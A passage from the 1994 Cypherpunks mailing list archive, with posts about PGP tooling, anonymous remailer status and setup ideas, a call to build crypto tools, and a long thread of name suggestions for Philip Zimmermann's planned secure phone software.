up it would be interesting to hear about any future plans for SFS. >I don't mind explaining a little bit about some areas of cryptanalysis, maybe >the various sieves. Chris might want to talk about some hardware ideas. I seem to have been dropped in at the tail end of the discussion, so if you can let me know what it's about I'll be able to disagree with you about it. Peter. From jburrell at crl.com Sun Dec 18 12:15:33 1994 From: jburrell at crl.com (Jason Burrell) Date: Sun, 18 Dec 94 12:15:33 PST Subject: PGP-Pine Scripts? Message-ID: <199412182020.PAA12545@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Are there any scripts out there to set Pine 3.91 up to use PGP for message encryption and signing? I would prefer to stay away from installing a 1MB+ executable, since I have neither the root privlidges on this machine or the disk space for such an endevour. Thanks. - -- Jason Burrell | PGP 2.6 public key available by finger. Geek Code (V2.1): | GCS/CM/S/M d++ H s:+ !g !p+ !au !a w+++ v+\(---)>!v San Antonio, TX | C++ UC+ P+>++++ L+ 3 E+ N+++ K--- W--- M-- !V -po+ | Y++ t++++ 5+++ jx R+ G tv++ b++ D- B-- e u++>+++ h* f+ | r* n---->+++ y? - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvSZaCoZzwIn1bdtAQHYvgF9GlGCfkFh9I/RMyRdXyuR55ELZQ6kHkiP MKf5XzOXt3S+bMs7uF12S/O3xaHCTVWf =jqpA -----END PGP SIGNATURE----- From ianf at sydney.sgi.com Sun Dec 18 15:38:34 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Sun, 18 Dec 94 15:38:34 PST Subject: Processing data, information and knowledge In-Reply-To: Message-ID: <9412191024.ZM26819@wiley.sydney.sgi.com> On Dec 16, 5:26pm, rishab at dxm.ernet.in wrote: > The alternative comes strangely enough from the US > National Security Agency. It has always been suspected > that the NSA searches through e-mail traffic for > 'sensitive' material, which for the large volumes involved > would require considerable help from computers. I always imagined that the development of the algorithm itself predated email, and started back with cable and telex traffic. > Earlier > this year, the agency began soliciting collaborations from > business to develop commercial applications of their > technique. It claimed to be able to quickly search through > large quantities of text, in any language, for > similarities to sample documents, and even automatically > sort documents according to topics that it identifies. A > similar though independently developed system is available > from California-based Architext. Has anyone got any further information about how this algorithm works? It sounds like Rishab has somewhat better info than was publicly available months ago when we last discussed this particular NSA "technology transfer". Ian. From werewolf at io.org Sun Dec 18 15:40:31 1994 From: werewolf at io.org (Mark Terka) Date: Sun, 18 Dec 94 15:40:31 PST Subject: Remailer at myriad.pc.cc.cmu.edu?? Message-ID: <199412182340.SAA12373@grin.io.org> I take it the above remailer has bitten the dust? I didn't see it in Ralph's last list. From sameer at c2.org Sun Dec 18 17:32:00 1994 From: sameer at c2.org (sameer) Date: Sun, 18 Dec 94 17:32:00 PST Subject: The NEXUS-Berkeley Presents: a New Years Party Message-ID: <199412190118.RAA17103@infinity.c2.org> If you get this note, then you're invited. Please don't forward this anywhere else, but you're welcome to bring friends. Apologies if you receive duplicates. -- Date: Dec 31, 1994 -> Jan 1, 1995 Time: 8PM-? Place: The NEXUS-Berkeley, Berkeley CA -- Please join us at the NEXUS-Berkeley while we bring in the new year, as it happens in New York, Chicago, Anchorage, and other cities around the continent. (I would include here the Australian sites but that would require that the party start approx. 7 AM on the 31st...) We expect other nexus-locations to be wired into the net along with us, although the connectivity at the other locations will probably be minimal. For all I know they might not be wired at all, leaving us with only our own new years to celebrate. In any case, I expect to have approximately 7 terminals which people can use to communicate with the other cities. (Then again, for all I know that might not happen.. We might not even have -1-... Ah the flux of life.) Bring someone to share. (You should also bring some-things- to share too, like drinks, snacks, etc.) Please RSVP for directions. (Mail sameer at c2.org.. I'd like to get an idea of how many people to expect, etc..) Thanks. -- sameer Voice: 510-841-2014 Master Conspirator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From amanda at intercon.com Sun Dec 18 17:53:15 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 18 Dec 94 17:53:15 PST Subject: Doomsaying, development, and deployment Message-ID: <9412182053.AA02959@eldamar.walker.org> A number of people have been saying things that amount to "imminent death of the Cypherpunks mailing list predicted, film at 11." Well, folks, if it dies, it will be the fault of those who just pick up their toys and go home. There's been a fair amount of discontent here in the the last year. I don't think it's a matter of any one flameful discussion (of which many have gone by recently). Rather, I think it's a matter of frustration. PGP has acheived a fair amount of recognition in the user community at large, and lately even in the mainstream press. However, beyond PGP and some anonymous remailers, there's not a lot else out there. There won't *be* anything unless we build it. No one's going to come riding in on his white horse to hand us crypto-security. We all agree we need better tools, and that everyone else needs better tools before they'll start adopting the technology we so fiercely believe can save us from the erosion of our civil liberty and personal privacy. So let's build those tools. Strange as it may seem, I actually have to weigh in on the side of Netscape in some of the arguments that have come by in the last week or so. They are building stuff, after all. That's better than most of the people on this list, from what I can tell. To put my money where my mouth is, I'll shut up completely until I can post an announcement of some useful crypto tool. It might be commercial, but it might be free--my employer does occasionally agree to give stuff away for the good of the Internet. Amanda Walker InterCon Systems Corporation From ianf at sydney.sgi.com Sun Dec 18 18:24:01 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Sun, 18 Dec 94 18:24:01 PST Subject: The NEXUS-Berkeley Presents: a New Years Party In-Reply-To: <199412190118.RAA17103@infinity.c2.org> Message-ID: <9412191315.ZM27253@wiley.sydney.sgi.com> On Dec 18, 5:18pm, sameer wrote: > Date: Dec 31, 1994 -> Jan 1, 1995 > Time: 8PM-? > Place: The NEXUS-Berkeley, Berkeley CA [...] > around the continent. (I would include here the Australian sites but > that would require that the party start approx. 7 AM on the 31st...) You've got your timezones wrong here: we on the East coast of Australia are currently 19 hours ahead of Berkeley, and so we'd need to be there at 3 PM on the 1st of January. Your new year in Berkeley will be 7 PM our time, and as the television fair will surely be woeful (has-been British and American actors in tired New Years Day Specials), I am sure that at least a few of us might be looking for other amusements. I'll be off recovering from the previous night, but others may want to get involved if you want to include Oz members. Ian. From Tony.Gurnick at nzdairy.co.nz Sun Dec 18 18:25:30 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Sun, 18 Dec 94 18:25:30 PST Subject: 2048 bit keys Message-ID: <94121915233879@nzdairy.co.nz> I saw a thread here a couple of weeks ago about generating 2048 bit keys after the 15-dec. I cant remember how to do it, can somebody please enlighten me??? T From skaplin at skypoint.com Sun Dec 18 18:26:15 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Sun, 18 Dec 94 18:26:15 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: <199412112031.MAA21646@netcom12.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: > Here's an idea. Someone mentioned trying to set up an anon remailer on the > North American Freenets, but it seemed there were software compatibility > problems. I'm the one guilty of that, the thread was under "Guerrilla Remailers." I wonder if it is possible to call procmail on these systems via the .forward file. If it is, why couldn't we write a procmail .procmailrc file to sanitize the headers? Drop three files in place and the remailer is up and running. Anyone have a freenet account to find out if this is possible? Please note this tagline, it seems quite apropos lately. ============================================================================== Our major obligation is not to mistake slogans for solutions. - Edward R. Murrow ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvTuEslnXxBRSgfNAQHSqwf8Dx4uy71naI8NVe9Fcd6ZkkMUr3T5vqMG 2VTfqVnoWQZoQeeuNLQ1poBNiZw0w+QHOX6en/5/+E5kpZ0JP7Ipu9Hzp57PuDe/ 7Vit91yFOJ0RQxD/CjyBiXRWyO7aKShU/iINK8FZj0wHH9FvUDy1s2/JRF5gVhO9 gJMmeh+vjknVjZND5qo29ei87NxHboLJDDgS8tttWzteFy40mnqyUAA9Gw/5cMrI Dq0NcpGAJCh3n7co+iHMWtf5ZCIeiXkOsCzqm8yrTtcf7Sfpw9gsRWuUJUXbSZ5L ulXtbfhz/jaIpYY5O1MZ9HE8xaaZat24t4ovR7J30rbx6VlFsrEFSg== =ZaON -----END PGP SIGNATURE----- From prz at acm.org Sun Dec 18 18:47:18 1994 From: prz at acm.org (Philip Zimmermann) Date: Sun, 18 Dec 94 18:47:18 PST Subject: Name that phone Message-ID: I'm trying to come up with a name for the secure phone software I'm planning on releasing. The software would turn any multimedia PC into a secure phone. I'm open to suggestions for the name. Some names that have been suggested: 1) Voice PGP 2) Pretty Good Secure Phone (PGSP) 3) PGP Phone I like 2 or 3. Does anyone want to suggest other names, or vote for which of these is better? Send your replies to prz at acm.org, with the subject line of "Name that phone". The winner will get a free copy. But then, so will a lot of other people. From lmccarth at bali.cs.umass.edu Sun Dec 18 19:03:03 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Sun, 18 Dec 94 19:03:03 PST Subject: Remailer at myriad.pc.cc.cmu.edu?? Message-ID: <199412190308.WAA15583@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Mark Terka writes: > I take it the above remailer has bitten the dust? I didn't see it in Ralph's > last list. I asked about this on the remailer-operators list the other day. It seems Matt G. asked Raph to remove it from the list temporarily; I think he's just gone on vacation for a little while. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvT2d2f7YYibNzjpAQEPTAQAt5nqYycS//ebW9ZsISwshdUtYmMHlGox 6WdkaU0x27whC08ppk3MULMVERXmRRAxs7yUcFUeea/nmjQFGqnITprWGW0h2ONl CqL1XNvp7miky/L0ESbM1H+fm1e2bWObn1mh57LQuzuX5pW01EB+g7pw8L8yJgs3 qqH747EZfaM= =vz9F - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvT5AioZzwIn1bdtAQG8SgF/UK/GUXDynLdM3hv0sHs1ev75lPIKFRPz Yvv3BdJg8B9jlhf9nfIgfPaTnrmfPtn+ =h8gc -----END PGP SIGNATURE----- From warrior at infinet.com Sun Dec 18 20:19:14 1994 From: warrior at infinet.com (warrior) Date: Sun, 18 Dec 94 20:19:14 PST Subject: Name that phone In-Reply-To: Message-ID: Secure Vox or Vox PGP On Sun, 18 Dec 1994, Philip Zimmermann wrote: > I'm trying to come up with a name for the secure phone software I'm > planning on releasing. The software would turn any multimedia PC > into a secure phone. > > I'm open to suggestions for the name. Some names that have been > suggested: > > 1) Voice PGP > 2) Pretty Good Secure Phone (PGSP) > 3) PGP Phone > > I like 2 or 3. Does anyone want to suggest other names, or vote for > which of these is better? Send your replies to prz at acm.org, with the > subject line of "Name that phone". The winner will get a free copy. > But then, so will a lot of other people. > > ___ /\ PGP the Cutting Edge of Privacy. /vvvvvvvvvvvv \-----------------------------------\ | WARRIOR ( | PGP Key Id 0X71FADEAD > Magnus Frater Videt Tu `^^^^^^^^^^^^ /===================================/ \/ Finger for PGP 2.6.2 public Key. PGP Fingerprint 59 BB DD BC BA E6 C7 77 34 81 09 92 62 6C 74 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | Dave M. Harvey warrior at infinet.com| | PO Box 151311 dharvey at freenet.columbus.oh.us| | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From werewolf at io.org Sun Dec 18 20:57:10 1994 From: werewolf at io.org (Mark Terka) Date: Sun, 18 Dec 94 20:57:10 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: <199412112031.MAA21646@netcom12.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , skaplin at skypoint.com (Samuel Kaplin) wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >In article , you wrote: > >> Here's an idea. Someone mentioned trying to set up an anon remailer on the >> North American Freenets, but it seemed there were software compatibility >> problems. > >I'm the one guilty of that, the thread was under "Guerrilla Remailers." I >wonder if it is possible to call procmail on these systems via the >.forward file. If it is, why couldn't we write a procmail .procmailrc file >to sanitize the headers? Drop three files in place and the remailer is up >and running. Anyone have a freenet account to find out if this is possible? Well I have an account on the Cleveland Freenet. Fire me over the necessary files with the instructions and we'll see pretty quickly whether its doable or not. I guess we'll also find out real fast (if it works) how long the freenet authorities will let it keep running... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLvUMQHBFBj7pSNyhAQFvVQf/Wy9VzIeFz0a57uXFGcKRJPO+PQ3N9MYu XYJJlAXHXRCGsOUyGDWQt1gD2Cs0gA7rHHy3mXvN29Yv0i+53WFMrv2B/nx7gc5N 8taCKe7F8Lax+k//ytMfdTbLwZbmeV3jaqXe4YVDAVK5fFV29ulcOmGpXuYlFksD i4W5/qy03BHq1ckWSz89EC3LT1NDdjr1JxbY0zr8OATaUoWS+3oUtSB890OE0G0N dinwdBT533xsfQz8NFsOH9LoRQ2AsiwVwdoTclSeto/ys5uLJPOSBYtgZdUzxmKf O+dHzKkYYDrbCug3zZZjbX7sIMoTHc6/Fhc0ttyD6zak+m7X0op+wA== =8I5c -----END PGP SIGNATURE----- From meconlen at IntNet.net Sun Dec 18 21:14:59 1994 From: meconlen at IntNet.net (Michael Conlen) Date: Sun, 18 Dec 94 21:14:59 PST Subject: MIME (again) In-Reply-To: <199412152043.PAA26851@dunx1.ocs.drexel.edu> Message-ID: On Thu, 15 Dec 1994, Bob Snyder wrote: > Only if the user chose to send things in application/pgp (or is it > text/pgp?) If they chose to send text/plain, they'd never have to > deal with PGP. > > Forcing PGP down people's throats is not a way of winning "converts." > You need to convince them of the need, they present well-integrated > tools that make it simple. If you try to force people to use PGP, > they'll find work-arounds and do what they can to avoid it. True, I never want to foce people to use something, however an application so universily used such as e-mail would make a good place to present PGP and allow people to have access to it without downloading and compiling PGP for their selves, for each computer that uses PGP, ect. If PGP remains as obscure to thoes not intrested in crypto, then I think the program will not reach the people it is intented for, the masses. Not everyone knows how to compile a program, or has the intrest in it enough to read the docs that come with it to set it up. this is the reason I have not used it yet, beacuse of just getting it set up. Groove on Dude Michael Conlen From sdw at lig.net Sun Dec 18 21:32:07 1994 From: sdw at lig.net (Stephen D. Williams) Date: Sun, 18 Dec 94 21:32:07 PST Subject: Doomsaying, development, and deployment In-Reply-To: <9412182053.AA02959@eldamar.walker.org> Message-ID: ... > So let's build those tools. Strange as it may seem, I actually have to weigh > in on the side of Netscape in some of the arguments that have come by in the > last week or so. They are building stuff, after all. That's better than most > of the people on this list, from what I can tell. How about starting a todo list so we can reach a consensus on a prioritized list of goals. This may help us come up with projects we can work together on. I'm itching to do some coding... > To put my money where my mouth is, I'll shut up completely until I can post an > announcement of some useful crypto tool. It might be commercial, but it might > be free--my employer does occasionally agree to give stuff away for the good > of the Internet. > > > > Amanda Walker > InterCon Systems Corporation sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From jrt at asiaonline.net Sun Dec 18 21:57:15 1994 From: jrt at asiaonline.net (jRT) Date: Sun, 18 Dec 94 21:57:15 PST Subject: Name that phone In-Reply-To: Message-ID: On Sun, 18 Dec 1994, Philip Zimmermann wrote: > I'm trying to come up with a name for the secure phone software I'm > planning on releasing. The software would turn any multimedia PC > into a secure phone. Good luck with it. From the name it figures that you're gonna use the PGP as the engine. As an aside, several years ago... I knew people who used 'crypto-phones'...all they did was time-slicing and basic simple scrambling. They sliced up the conversation into 1/100ths of a second and regurgitated it at the other end. A friend of mine could listen to the 'encoded' output and tell you exactly what they were saying...in real time :> I guess PGP should be better (or 1/10000 sec time slices :> ) just for interest. jRT From sdw at lig.net Sun Dec 18 22:04:35 1994 From: sdw at lig.net (Stephen D. Williams) Date: Sun, 18 Dec 94 22:04:35 PST Subject: Name that phone In-Reply-To: Message-ID: > > > Secure Vox or Vox PGP VeriVox (Isn't VeriPhone in existence? sounds familiar) PriVox (PriVoxy) DOS Vox (Dome of Silence ...) LB Vox (Little Brother Speaks, and no one can hear) Vox/1994 (tenuous reference to conquering 1984/BB, 1994 being somewhat year of public crypto, etc. Oh, nevermind. ) Private is my adjective of choice lately since laypeople don't know what crypto is and secure seems ambiguous to me (in laymens mindset). > On Sun, 18 Dec 1994, Philip Zimmermann wrote: > > > I'm trying to come up with a name for the secure phone software I'm > > planning on releasing. The software would turn any multimedia PC > > into a secure phone. > > > > I'm open to suggestions for the name. Some names that have been > > suggested: > > > > 1) Voice PGP > > 2) Pretty Good Secure Phone (PGSP) > > 3) PGP Phone > > > > I like 2 or 3. Does anyone want to suggest other names, or vote for > > which of these is better? Send your replies to prz at acm.org, with the > > subject line of "Name that phone". The winner will get a free copy. > > But then, so will a lot of other people. > > > > > > ___ > /\ PGP the Cutting Edge of Privacy. > /vvvvvvvvvvvv \-----------------------------------\ > | WARRIOR ( | PGP Key Id 0X71FADEAD > Magnus Frater Videt Tu > `^^^^^^^^^^^^ /===================================/ > \/ Finger for PGP 2.6.2 public Key. > > PGP Fingerprint 59 BB DD BC BA E6 C7 77 34 81 09 92 62 6C 74 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > | Dave M. Harvey warrior at infinet.com| > | PO Box 151311 dharvey at freenet.columbus.oh.us| > | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > > > -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From xpat at vm1.spcs.umn.edu Sun Dec 18 22:47:37 1994 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Sun, 18 Dec 94 22:47:37 PST Subject: Secure Phone software Message-ID: <9412190647.AA19841@toad.com> On Sun, 18 Dec 1994, Philip Zimmermann wrote: > I'm trying to come up with a name for the secure phone software I'm > planning on releasing. The software would turn any multimedia PC > into a secure phone. OK, how about: IronClad StonePhone BuzzOff SpeakEasy SpeakFreely BlackHole BlackPipe SecurePipe MYOB (Mind Your Own Business, in the spirit of PGP) Wall To Wall (WTW) <--this gets my vote ---------------------------------------------------------------------- P M Dierking xpat at vm1.spcs.umn.edu | From blancw at pylon.com Sun Dec 18 22:49:12 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Sun, 18 Dec 94 22:49:12 PST Subject: Name that phone Message-ID: <199412190649.WAA16857@deepthought.pylon.com> MMPCPGPVSP ( MultiMedia PC PGP-Voice-Secure Phone ) PGVEPCP ( Pretty Good Voice Encryped PC Phone ) Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Blanc From nobody at rebma.rebma.mn.org Sun Dec 18 23:12:28 1994 From: nobody at rebma.rebma.mn.org (nobody at rebma.rebma.mn.org) Date: Sun, 18 Dec 94 23:12:28 PST Subject: NONE Message-ID: <199412190814.CAA18021@rebma.rebma.mn.org> Matthew Ghio, You've done a great job in the past and continue to do so, but for the past week some (all?) of your users have not been getting any mail. What happened? Post to cypherpunks, remailer-operators, alt.privacy or alt.anonymous.messages, alt.abuse.recovery (either one. You choose). Thanks. END From norm at netcom.com Sun Dec 18 23:21:09 1994 From: norm at netcom.com (Norman Hardy) Date: Sun, 18 Dec 94 23:21:09 PST Subject: MacPGP Message-ID: Now I have something nice to say about MacPGP: It can take its input and output from the clip board. This makes it about half as much work as it was before. Look in "Dialog Shortcuts" under the "Options" menu. From skaplin at skypoint.com Sun Dec 18 23:33:16 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Sun, 18 Dec 94 23:33:16 PST Subject: Name that phone (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: > I like 2 or 3. Does anyone want to suggest other names, or vote for > which of these is better? Send your replies to prz at acm.org, with the > subject line of "Name that phone". The winner will get a free copy. > But then, so will a lot of other people. Hi Phil, How about S.P.I.T. S ecure P hone I mplementation or interphase T erminal or technology Then you could S.P.I.T. on the government as they tried to listen to your conversations or S.P.I.T. on your employer as they tried to monitor your phone usage. Or you could S.P.I.T. in the wind if you have no one to call. ;) More names will probably follow. Sam ============================================================================== If you think education is expensive, try ignorance. - Derek Bok, 1978 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvU19clnXxBRSgfNAQESywf/RAZpscfhMJiJhb61GxMc9ar4tC0WiuJu NOhgLd+hGoNfuue3byCjFz5OScsfmYKyr2mpmLi4a/38UPvOV1ZXc5jqxYv0mI0b uqsIKf+YJQvxRQi9uXlFf03SPs/Omx6hYVjpkEjbHSIj+YiNB9eBuxV/3lBWLjHg mJ1Ul/nYJv6106DGbE5wrBVxUX7N2UBKLn7B8785vJGTHPz1aa1xl6VJtCIm3E3C HQN3F0joR4H6iPoAgo7qyRPvPIed9yk/Rnj5nyR7kRiFnAEJQ8DZuke/xLHKsXo7 OoB5fqPxD9Se6vFewql8JccW1fsakExTpO9YpcptXnkhXZrfo5/1bw== =wQO2 -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Sun Dec 18 23:46:03 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sun, 18 Dec 94 23:46:03 PST Subject: Name that phone (fwd) Message-ID: At 2:26 AM 12/19/94, Samuel Kaplin wrote: >More names will probably follow. Um, could they maybe not follow to the cypherpunks list? Phil asked people to send suggestions to him with a particular subject. He didn't ask people to send them to the cypherpunks list. I hope I'm not being overly annoyed here, but I just don't particulary relish the thought of 10 posts a day for the next two weeks composed of suggestions for what to call Phil's crypto phone. Then again, I guess they aren't too much worse then 50 posts a day about the merits of MIME, or whether Mosaic Communications is Evil Incarnate or Just Good Capitalists. But best of all would be to have neither those posts nor posts saying "Hey Phil, how about 'Phil's Sooper Kean-o War3z D00d Ph0n3'? (PSKWDP) Cool, right?" From witter at utdallas.edu Sun Dec 18 23:57:45 1994 From: witter at utdallas.edu (witter at utdallas.edu) Date: Sun, 18 Dec 94 23:57:45 PST Subject: Name that phone In-Reply-To: Message-ID: Cryptriloquist- crypto & ventriloquist SFS- Safe Fone System Zimmerphone Tapestry- reference to weft & warp of Individual threads Social Security- Only seems fair that we should have something of that name that is functional. murmur The Village Voice Echo- The nymph whose unrequited love for Narcissus caused her to pine away until nothing but her voice remained. phonetiquette- phone, phonetic, & etiquette Re-Voice Babbler- a tape recording of several dozen voices talking at the same time, used as an antibugging device to make private or secret conversations inaudible to eavesdroppers. New Obiter Dictum (NOD)- An incidental remark or observation; a passing comment. Phone DeBug (PDB) AIWWA- As if we were alone :o- or your emoticon of choice, it would be the first software to be titled under a non-alphabetical symbol. My question is if/how this new software would work between modems. :.:.:.:.:.:.:.:.: : Paper_Soldier : :.:.:.:.:.:.:.:.: From lmccarth at bali.cs.umass.edu Mon Dec 19 00:12:00 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Mon, 19 Dec 94 00:12:00 PST Subject: Name that phone elsewhere Message-ID: <199412190816.DAA18843@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Jonathan Rochkind writes: > Then again, I guess they aren't too much worse then 50 posts a day about > the merits of MIME, or whether Mosaic Communications is Evil Incarnate or > Just Good Capitalists. But best of all would be to have neither those > posts nor posts saying "Hey Phil, how about 'Phil's Sooper Kean-o War3z > D00d Ph0n3'? (PSKWDP) Cool, right?" I agree. This is in danger of turning into a variant of the c'punks logo thread, to which I unfortunately contributed a couple of times in public. Please send groovy name suggestions to PRZ, but please don't cc: them here. - - -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." --FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvU+pGf7YYibNzjpAQF9dgQAmRVbj9qS2+uB64KUKeF4lIjNgCR0RGHl Wfd0r6pad7Rgmn94li9GRuwKUKcn/RsRKEXLB9ywIroHGh8M2C/2RpCYol7eZp9+ CUi1p8QWgMYRHU5hgVPRSnoJ2n4VCY4sWAEUiFX2Hq0G8IF/x84ozHKzdsFfq2+/ OuHhwQCEdOM= =iZS1 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvVBVioZzwIn1bdtAQEuXQGAw8WC0Ay0ZVEkuY/Dh20a2Jcxpcp7ZKYu rdtvEGFO1+dUDudY+KYV0YyedS5G2J0h =Nllh -----END PGP SIGNATURE----- From skaplin at skypoint.com Mon Dec 19 02:22:44 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 19 Dec 94 02:22:44 PST Subject: Name that phone elsewhere In-Reply-To: <199412190816.DAA18843@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412190816.DAA18843 at bb.hks.net>, you wrote: > Jonathan Rochkind writes: > > Then again, I guess they aren't too much worse then 50 posts a day about > > the merits of MIME, or whether Mosaic Communications is Evil Incarnate or > > Just Good Capitalists. But best of all would be to have neither those > > posts nor posts saying "Hey Phil, how about 'Phil's Sooper Kean-o War3z > > D00d Ph0n3'? (PSKWDP) Cool, right?" > > I agree. This is in danger of turning into a variant of the c'punks logo > thread, to which I unfortunately contributed a couple of times in public. > > Please send groovy name suggestions to PRZ, but please don't cc: them here. The reason I forwarded the message here, was that I thought it might elicit a chuckle from some. After all the infighting here lately I thought some comic relief might help lighten things up a bit. Evidently I was wrong. I stand humbly censored before you all. ;) <--denotes tongue in cheek Sam ============================================================================== Actual war is a very messy business. Very, very messy business. -- Kirk, "A Taste of Armageddon", stardate 3193.0 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvVdqMlnXxBRSgfNAQHwSQf/Rp4YpkZusCNvJByGjfrrnsVz20hUrh8i 8uIZFDfSdPuKFMnTgFqD4Flhbf8yJlzBhxxiMIbgpzCasTfxgABZpnGbEk6DdImu FMbaPAfQ8r8pO3OkInaISnIyo9LRk7r9Y698AY55PpmSsPgvy5OVuHRUlBEQaipN krsKlSd4dthz7hpdBy3pmbqb8J3/TIACD1ZDjiI2717fViSCuqlxnf7F0+CE4ezI uUd10ta0/i4/UQvuCVwR/Forl6uvsv34N6clo8xweox6JzO6q3EVKf4/an1SEB7F S27DW6Qz2JZEMsVrDTv+4pxRkZdnzTWm70gYXp9Lyvw4L6Eqhip9nQ== =HfAo -----END PGP SIGNATURE----- From skaplin at skypoint.com Mon Dec 19 02:43:18 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 19 Dec 94 02:43:18 PST Subject: Any suggestions for additions to this? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- My auto-responder is up, but not all of the files listed are there yet. Anybody have any suggestions for additions to the list? Sam - --------------------------------------------------------------------------- This is the index for Sam Kaplin's Auto-Responder. To get a file: Send a message to: skaplin at c2.org The the subject of the message MUST BE: SEND FILE [file_name] EXAMPLE: Subject: SEND FILE help All binary files are UUENCODED with PGP signatures. Please address all comments or problems to skaplin at skypoint.com. If you receive a blank message back, then the file you requested does not exist. Please note that a copy of your request will be logged. Should you have a crypto related file that you would like added, contact me at: skaplin at skypoint.com. Please note that I am subject to the petty whims of the U.S. government, so I will not add any files which may be subject to ITAR. File Name Description - -------------------------------------------------------------------------- apgp212_1.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 1 of 4 apgp212_2.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 2 of 4 apgp212_3.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 3 of 4 apgp212_4.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 4 of 4 